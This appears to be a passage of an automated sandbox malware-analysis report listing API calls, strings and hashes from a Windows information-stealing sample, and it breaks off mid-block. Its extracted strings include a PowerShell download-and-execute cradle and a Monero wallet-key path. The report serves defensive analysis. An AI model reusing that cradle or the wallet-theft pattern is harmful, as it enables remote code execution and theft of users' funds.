                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00172D85
                          Strings
                          • ')", xrefs: 00172CB3
                          • <, xrefs: 00172D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00172D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00172CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 4f5133a8a047483c008bb06e9b63a6464d775462dc5314c513948547dbed9253
                          • Instruction ID: c62b33680ac0851a8a9f75850f11002841e952ac83157daa14d77334ac538f7e
                          • Opcode Fuzzy Hash: 4f5133a8a047483c008bb06e9b63a6464d775462dc5314c513948547dbed9253
                          • Instruction Fuzzy Hash: 3641D471C501089ADB19FFA0C896FDEBB74AF64300F908119F11AB7191DF746A4ACF92
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00169F41
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: c2918b9303ecdaba0840fdf673a3a594636216127824df60c9e769f2f7712577
                          • Instruction ID: f41245940dc087d817c67aeae90db54deb9901b0fc6b999e0e9fd45d6ed17252
                          • Opcode Fuzzy Hash: c2918b9303ecdaba0840fdf673a3a594636216127824df60c9e769f2f7712577
                          • Instruction Fuzzy Hash: 48614171A10248EBDB18EFA4CC96FEE7779AF95304F408418F90A9F191EB746A05CF52
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00CCE098,00000000,00020119,?), ref: 001740F4
                          • RegQueryValueExA.ADVAPI32(?,00CCF4A0,00000000,00000000,00000000,000000FF), ref: 00174118
                          • RegCloseKey.ADVAPI32(?), ref: 00174122
                          • lstrcat.KERNEL32(?,00000000), ref: 00174147
                          • lstrcat.KERNEL32(?,00CCF578), ref: 0017415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: b7533108f1ed824aa3db29d399d6e36becc19b7f0203d77b6b4aea18c83655fd
                          • Instruction ID: d8c8eabe359a263eec1dc3ea00e77d4df6baa105ee222feeb0465572119cf655
                          • Opcode Fuzzy Hash: b7533108f1ed824aa3db29d399d6e36becc19b7f0203d77b6b4aea18c83655fd
                          • Instruction Fuzzy Hash: 5F41B7B79001086BDB15EBA0DC46FFE733DAB99300F008959B61A96181EF755B88CB92
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBBD68,00000000,00020119,?), ref: 00177E5E
                          • RegQueryValueExA.ADVAPI32(?,00CCE238,00000000,00000000,000000FF,000000FF), ref: 00177E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00177E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 64ce482c958b5b92a3198332ee6d0cc4df49004a18368e219f57241e75e96e3a
                          • Instruction ID: f724e79095bdd539a4c09027e5f20509e22b6a7931d13e5a3c9dfd51c4749ec6
                          • Opcode Fuzzy Hash: 64ce482c958b5b92a3198332ee6d0cc4df49004a18368e219f57241e75e96e3a
                          • Instruction Fuzzy Hash: 1F119EB2A44609EBD705CFD4DD49FBBBBBCEB09B00F108119F605A7280DB785800CBA1
                          APIs
                          • StrStrA.SHLWAPI(00CCF020,?,?,?,0017140C,?,00CCF020,00000000), ref: 0017926C
                          • lstrcpyn.KERNEL32(003AAB88,00CCF020,00CCF020,?,0017140C,?,00CCF020), ref: 00179290
                          • lstrlen.KERNEL32(?,?,0017140C,?,00CCF020), ref: 001792A7
                          • wsprintfA.USER32 ref: 001792C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 7f9ec14cd2061ff96dbebf78d74e034dc558420a8ddac94c28d41e4be273278c
                          • Instruction ID: b3d31e488331b2b04974aa7c978029daee7b5711abb6e1e616b167d24974f3da
                          • Opcode Fuzzy Hash: 7f9ec14cd2061ff96dbebf78d74e034dc558420a8ddac94c28d41e4be273278c
                          • Instruction Fuzzy Hash: 9B01D676500608FFCB05DFECC998EAE7BB9EB49354F108148F9099B245C731AA80DBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001612B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001612BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001612D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001612F5
                          • RegCloseKey.ADVAPI32(?), ref: 001612FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 638b657b8f09ccf2597fa936875616d5ca8910969c372298cf2b55b5c1462489
                          • Instruction ID: 658a0a87bd71a1e4e3547b68fba7ed7e0b2bcd1e9cc44497a5160cc5325df1a5
                          • Opcode Fuzzy Hash: 638b657b8f09ccf2597fa936875616d5ca8910969c372298cf2b55b5c1462489
                          • Instruction Fuzzy Hash: EB011DBAA40208BBDB05DFE4DC49FAEBBBCEB48701F108159FA0597280D7759A01CB51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 4bd456c2efe7ac49db4f25d68bf422de458c1489d814fb8c88c68c24e828d8d9
                          • Instruction ID: 4481d7cdd93cc1626bdaba18698fba381ff4c860c9cd1252986e91b36e88a22c
                          • Opcode Fuzzy Hash: 4bd456c2efe7ac49db4f25d68bf422de458c1489d814fb8c88c68c24e828d8d9
                          • Instruction Fuzzy Hash: 8441E5B110079C5EDB258B248C84BFBBBF99F45708F1484ECEA8E86182D3719A448FA0
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00176663
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00176726
                          • ExitProcess.KERNEL32 ref: 00176755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 8373b37e679be65be00182afb4e9c622c1fd32a1bd9f261d7e0cfc4f3bbce45c
                          • Instruction ID: 4a71005ca369c2d731f33bf3fc1c82e6b79f71eab707506ebd3bac7eb62d27f7
                          • Opcode Fuzzy Hash: 8373b37e679be65be00182afb4e9c622c1fd32a1bd9f261d7e0cfc4f3bbce45c
                          • Instruction Fuzzy Hash: FB313CB2801208ABDB55EB90DC95FDE777CAF94300F808198F31966191DF746B48CF5A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00180E28,00000000,?), ref: 0017882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178836
                          • wsprintfA.USER32 ref: 00178850
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: de8fd8d9cd8349275b3d0c4285bc076cd6376f024f43f7e7e0029280e999f7da
                          • Instruction ID: 60152742c15be4ead0ee804a53fd54526fae9e1e7999fb463a801483b220f3db
                          • Opcode Fuzzy Hash: de8fd8d9cd8349275b3d0c4285bc076cd6376f024f43f7e7e0029280e999f7da
                          • Instruction Fuzzy Hash: 3E21FEB2A40608AFDB05DF94DD49FAEBBBCFB49B11F104119F605A7290C7799901CBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0017951E,00000000), ref: 00178D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00178D62
                          • wsprintfW.USER32 ref: 00178D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: ed89edd06c491f94146761d61dfcdbf5ce098ce2c5b1c8154962b35878b5921c
                          • Instruction ID: 1ec74102a9189d2078bbe474528eeab3f6b5d5148e68fdc48e7c5736dc2970ba
                          • Opcode Fuzzy Hash: ed89edd06c491f94146761d61dfcdbf5ce098ce2c5b1c8154962b35878b5921c
                          • Instruction Fuzzy Hash: 8EE046B2A40208BBC701DF94DC0AA697BACEB0A702F000094F90986280DA759A008B92
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0016A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0016A6BC
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0016A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7d9913b539cbea182d4cb640df916791fa2b0cfe074278f8eabb5c5334dc1e50
                          • Instruction ID: 87bd17a37fa52daee5dba688e421a8e45cdffae5e4be75f5e780b50515579d57
                          • Opcode Fuzzy Hash: 7d9913b539cbea182d4cb640df916791fa2b0cfe074278f8eabb5c5334dc1e50
                          • Instruction Fuzzy Hash: AEE1CF728501189BDB05FBA4DC92EEE733CAFA4301F90C169F51A76091EF346B59CB62
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
